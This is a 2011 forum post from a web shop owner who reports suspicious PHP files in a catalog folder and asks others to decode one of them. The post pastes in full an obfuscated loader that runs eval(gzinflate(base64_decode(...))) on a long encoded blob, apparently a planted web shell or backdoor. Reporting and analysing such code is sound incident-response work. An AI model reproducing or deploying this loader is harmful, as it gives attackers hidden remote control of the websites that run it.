Follkes Posted January 22, 2011 Share Posted January 22, 2011 Hi guys I have found (all in the catalog folder)fly.php, flops.php and uploat.php, and a main.inc.php with this code: <?php eval(gzinflate(base64_decode('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')));?> Those files date are quite old so I presume the site was attacked before bunkering it with all security contributions, admin folder renaming and the htaccess protection of that folder. Google did not detected any malware with webmasters tools. Could anyone decipher that piece of code to see their target please? the site has no card/paypal service implemented so at least no customer will be affected. Any clues to search for exotic code? Link to comment Share on other sites More sharing options...
